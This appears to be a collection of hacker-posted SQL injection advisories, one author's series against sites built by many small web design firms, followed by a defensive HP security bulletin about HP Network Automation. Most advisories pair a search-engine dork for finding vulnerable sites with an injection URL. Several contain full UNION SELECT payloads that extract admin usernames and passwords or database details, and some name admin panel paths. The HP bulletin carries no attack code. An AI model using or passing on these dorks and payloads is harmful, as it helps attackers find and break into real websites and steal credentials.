IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Muzedon (dettaglio.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered By Muzedon.com inurl:dettaglio.php?id= Exploite: www.victim.com/dettaglio.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
netplanet (dettaglio.asp?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## netplanet (dettaglio.asp?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.netplanet.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by netplanet inurl:dettaglio.asp?id= Exploite: www.victim.com/dettaglio.asp?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
InYourLife (dettaglio.php?id) (dettaglio_immobile.php?id) (notizia.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## InYourLife (dettaglio.php?id) (dettaglio_immobile.php?id) (notizia.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.inyourlife.info/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by InYourLife inurl:dettaglio.php?id= Exploite: www.victim.com/dettaglio.php?id=[SQL] Dork : Powered by InYourLife inurl:dettaglio_immobile.php?id= Exploite: www.victim.com/dettaglio_immobile.php?id=[SQL] Dork : Powered by InYourLife inurl:notizia.php?id= Exploite: www.victim.com/notizia.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
lab382 (dettaglio.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## lab382 (dettaglio.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.lab382.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Web site by: lab382.com inurl:dettaglio.php?id= Exploite: www.victim.com/news/dettaglio.php?id=+9 union select 1,user_pswd,3,4,5,6,7,8 from utenti # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
WebRising (dettaglio.asp?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## WebRising (dettaglio.asp?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.webrising.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : www.webrising.it inurl:dettaglio.asp?id= Exploite: www.victim.com/dettaglio.asp?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Xplace Company (dettaglio.asp?id) (alloggi-dett.asp?id) (eventi.asp?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Xplace Company (dettaglio.asp?id) (alloggi-dett.asp?id) (eventi.asp?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.xplacecompany.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Xplace Realizzazione siti web inurl:.asp?id= Exploite: www.victim.com/dettaglio.asp?id=[SQL] www.victim.com/alloggi-dett.asp?id=[SQL] www.victim.com/eventi.asp?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Neox (categoria.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Neox (categoria.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.neox.es/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : inurl:categoria.php?id= Diseño web - Málaga Exploite: www.victim.com/categoria.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
QOLQA (categoria.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## QOLQA (categoria.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.qolqa.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : QOLQA inurl:categoria.php?id= Exploite: www.victim.com/categoria.php?id=-10 union select 1,2,3,4,5,6 from login-- # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
PCVmedia (free_gallery.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## PCVmedia (free_gallery.php?cat_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.pcvmedia.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Website designed developed by PCVmedia.com inurl:free_gallery.php?cat_id= Exploite: www.victim.com/free_gallery.php?cat_id=-1 union select 1,2,concat(username,0x3,password),4,5,6 from cs_admin # Admin Panel : www.victim.com/admin # SpeCial TanX To : Dj7Xpl , Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
CdeVision(students.php?id) (gallery.php?cat) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## CdeVision(students.php?id) (gallery.php?cat) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.cdevision.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Site by cdeVision inurl:students.php?id= Exploite: www.victim.com/students.php?id=[SQL] Dork : Site by cdeVision inurl:gallery.php?cat= www.victim.com/gallery.php?cat=[SQL] # SpeCial TanX To : Dj7Xpl , Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
DoodleIT (gallery.php?id) (about.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## DoodleIT (gallery.php?id) (about.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.doodleit.co.uk/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Design by DoodleIT inurl:gallery.php?id= Exploite: www.victim.com/gallery.php?id=[SQL] Dork : Design by DoodleIT inurl:about.php?id= Exploite: www.victim.com/about.php?id=[SQL] # SpeCial TanX To : Dj7Xpl , Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
BACKEND (categoria.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## BACKEND (categoria.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.backend.com.mx/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Desarrollado por BACKEND Diseños Web inurl:categoria.php?id= Exploite: www.victim.com/categoria.php?id=[SQL] # SpeCial TanX To : Dj7Xpl , Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
SAY Comunicacion (producto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## SAY Comunicacion (producto.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.saycomunicacion.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Diseno Web:SAY Comunicacion inurl:producto.php?id= Exploite: www.victim.com/producto.php?id=[SQL] # SpeCial TanX To : Dj7Xpl , Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Arte Dude (collections.php?id) (property.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Arte Dude (collections.php?id) (property.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.artdudegraphics.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : inurl:property.php?id= an art dude graphics design Exploite: www.victim.com/pages/property.php?id=-9/**/Union/**/Select/**/Null,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,Null Dork : inurl:collections.php?id= an art dude graphics design Exploite: www.victim.com/pages/collections.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Web Design Sydney (news-item.php?id) (news-item.php?newsid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Web Design Sydney (news-item.php?id) (news-item.php?newsid) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.milkdigital.com.au/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : web design sydney - MILK Digital inurl:news-item.php?id= Exploite: www.victim.com/news-item.php?id=[SQL] Dork : web design sydney - MILK Digital inurl:news-item.php?newsid= Exploite: www.victim.com/news-item.php?newsid=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Avant-Garde Technologies (display-section.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Avant-Garde Technologies (display-section.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.agtsindia.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Avant-Garde Technologies inurl:display-section.php?id= Exploite: www.victim.com/display-section.php?id=-1 union select null,concat(user(),0x3a,version(),0x3a,database()),null # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Liberating IT (picture.php?gid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Liberating IT (picture.php?gid) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.liberatingit.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Web Design by LiberatingIT.com inurl:picture.php?gid= Exploite: www.victim.com/picture.php?gid=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Amigot Corp (story.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Amigot Corp (story.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://amigot.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered By Amigot Corp inurl:story.php?id= Exploite: www.victim.com/story.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
6House Design (product_details.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## 6House Design (product_details.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://sixhousedesign.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Designed By: 6House Design inurl:product_details.php?id= Exploite: www.victim.com/products/product_details.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
THE STUDIO (prod.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## THE STUDIO (prod.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.thestudio.net/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Site designed by The Studio, INC. inurl:prod.php?id= Exploite: www.victim.com/prod.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
SEO New York (prod.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## SEO New York (prod.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.eyesonnet.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by:SEO New York inurl:prod.php?id Exploite: www.victim.com/prod.php?id=-1 union select 1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6-- # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
EasyContent CMS (participant.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## EasyContent CMS (participant.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.emmattweb.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by EasyContent CMS inurl:participant.php?id= Exploite: www.victim.com/participant.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Chezola Systems (display-section.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Chezola Systems (display-section.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://chezolasystems.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Chezola Systems Canada Inc Exploite: www.victim.com/display-section.php?id=-1992 union select Null,concat(admin_name,0x3a,admin_password),Null from wantiti_admin # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Kimia Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Kimia ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.kimia.co.za/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Graphic design Website design by Kimia inurl:id= Exploite: www.victim.com/image-details.php?id=[SQL] www.victim.com/alert_article.php?id=[SQL] www.victim.com/news-article.php?id=[SQL] www.victim.com/gallery-list.php?id=[SQL] www.victim.com/newsitem.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Synchrony Infotech (product_details.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Synchrony Infotech (product_details.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.synchrony.co.in/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Designed by synchrony infotech. inurl:product_details.php?id= Exploite: www.victim.com/product_details.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
XWeavers (page.asp?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## XWeavers (page.asp?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://xweavers.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : inurl:page.asp?id= Designed and Developed by XWeavers.com Exploite: www.victim.com/page.asp?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Vegetav (news_item.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Vegetav (news_item.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.vegetav.co.uk/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : website design by Vegetav inurl:news_item.php?id= Exploite: www.victim.com/news_item.php?id=-1+union+select+1,user(),3,version(),5,6 # Admin Panel : www.victim.com/admin.php # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
cgcraft llc (info.php?id) (news_item.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## cgcraft llc (info.php?id) (news_item.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.cgcraft.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : website by cgCraft llc inurl:news_item.php?id= Exploite: www.victim.com/news_item.php?id=-1 union select 1,2,username,4,5,6,7,8,pword,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users Dork : Website by cgCraft llc inurl:info.php?id= Exploite: www.victim.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+users-- # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Coherendz (products.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Coherendz (products.php?cat_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.coherendz.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Exploite: www.victim.com/products.php?cat_id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
WOC Consulting (search_result.php?cid) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## WOC Consulting (search_result.php?cid) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.woc-consulting.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by WOC Consulting Canada Exploite: www.victim.com/search_result.php?cid=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Canoy Softwares (search_result.php?loc_id) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Canoy Softwares (search_result.php?loc_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://canoysoft.in/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Canoy Softwares inurl:search_result.php?loc_id= Exploite: www.victim.com/search_result.php?loc_id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Zones Web Solution (status.asp?print) (search_result.php?loc_id) Remote SQL injection Vulnerabilities
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerabilities ## ## Zones Web Solution (status.asp?print) (search_result.php?loc_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.zones.in/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Zones Web Solution inurl:status.asp?print= Exploite: www.victim.com/status.asp?print=1cno=[SQL] Dork : Powered by Zones Web Solution inurl:search_result.php?loc_id= Exploite: www.victim.com/search_result.php?loc_id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Avon Groups (search_result.php?cid) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Avon Groups (search_result.php?cid) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.avongroups.in/it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered By: Avon Enterprises Pvt. Ltd. inurl:search_result.php?cid=' Exploite: www.victim.com/search_result.php?cid=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Web Fusion Nepal (find.php?id) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Web Fusion Nepal (find.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://webfusion.com.np/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by: Web Fusion Nepal inurl:find.php?id= Exploite: www.victim.com/find.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Infocus Web Solutions (news_desc.php?id) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Infocus Web Solutions (news_desc.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.infocuswebdesigning.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Infocus Web Solutions (P) Ltd. inurl:news_desc.php?id= Exploite: www.victim.com/news_desc.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
A1 Solutions (cat_sell.php?cid) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## A1 Solutions (cat_sell.php?cid) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.a1sols.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by A1 Solutions inurl:cat_sell.php?cid= Exploite: www.victim.com/cat_sell.php?cid=-1 union select 1,concat(user_name,0x3a,pass),1,1,1,1,1,1 from admin # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
indiacon (selloffers.php?cid) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## indiacon (selloffers.php?cid) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.indiacon.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : inurl:selloffers.php?cid= Powered by indiacon.com Exploite: www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
CobraScripts (selloffers.php?cid) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## CobraScripts (selloffers.php?cid) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://cobrascripts.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by CobraScripts inurl:cat_sell.php?cid= Exploite: www.victim.com/selloffers.php?cid=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
[security bulletin] HPSBMU02693 SSRT100583 rev.1 - HP Network Automation Running on Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02942385 Version: 1 HPSBMU02693 SSRT100583 rev.1 - HP Network Automation Running on Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-07-28 Last Updated: 2011-07-28 Potential Security Impact: Remote SQL injection, cross site scripting (XSS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Network Automation running on Linux, Solaris, and Windows. The vulnerabilities could be exploited remotely resulting in SQL injection and cross site scripting (XSS). References: CVE-2011-2402(XSS), CVE-2011-2403 (SQL injection) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Network Automation v7.2x, v7.5x, v7.6x, v9.0, v9.10 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-2402(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2011-2403(AV:N/AC:L/Au:S/C:C/I:C/A:C) 9.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided a patch to resolve the vulnerabilities for HP Network Automation v9.10. The patch is available here: http://support.openview.hp.com/selfsolve/patches Upgrade to HP Network Automation v9.10 Apply patch 1 or subsequent (Title: Network Automation 09.10.01, Document ID: KM1207081) HISTORY Version:1 (rev.1) - 28 July 2011 Initial Release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2011 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 